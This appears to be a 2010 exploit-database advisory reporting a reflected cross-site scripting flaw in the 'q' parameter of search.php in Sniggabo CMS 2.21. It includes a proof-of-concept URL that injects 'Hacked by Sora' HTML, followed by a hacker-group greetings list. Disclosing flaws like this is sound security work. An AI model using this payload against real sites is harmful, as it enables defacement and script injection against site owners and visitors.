Sniggabo CMS 2.21 Cross Site Scripting

`# Exploit Title: Sniggabo CMS v2.21 Cross Site Scripting Vulnerability  
# Date: January 6th, 2010  
# Author: Sora  
# Version: v2.21  
# Tested on: Windows Vista Home Premium and Linux 2.6.32  
  
—————————————-  
> Sniggabo CMS v2.21 Cross Site Scripting Vulnerability  
> Author: Sora  
> Contact: vhr95zw [at] hotmail [dot] com  
> Website: http://greyhathackers.wordpress.com/  
> Google Dork: “In your dreams, script kiddies.”  
  
# Description:  
Sniggabo CMS v2.21 suffers a cross site scripting vulnerability in the parameter  
‘q’ of search.php.  
  
# PoC: http://www.site.com/search.php?q=%3Ch1%3EHacked%20by%20Sora%20-%20vhr95zw%20[at]%20hotmail%20[dot]%20com%3C/h1%3E%3Chr%3Eh4×3d%20-%20http://greyhathackers.wordpress.com/%3Cbr%3E&site=www.google.ca  
  
# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes # Mafia Boyz DZ Crew # 原点 # cyber-sec.org # greyhathackers.wordpress.com # incursioexsubter.info #  
  
  
`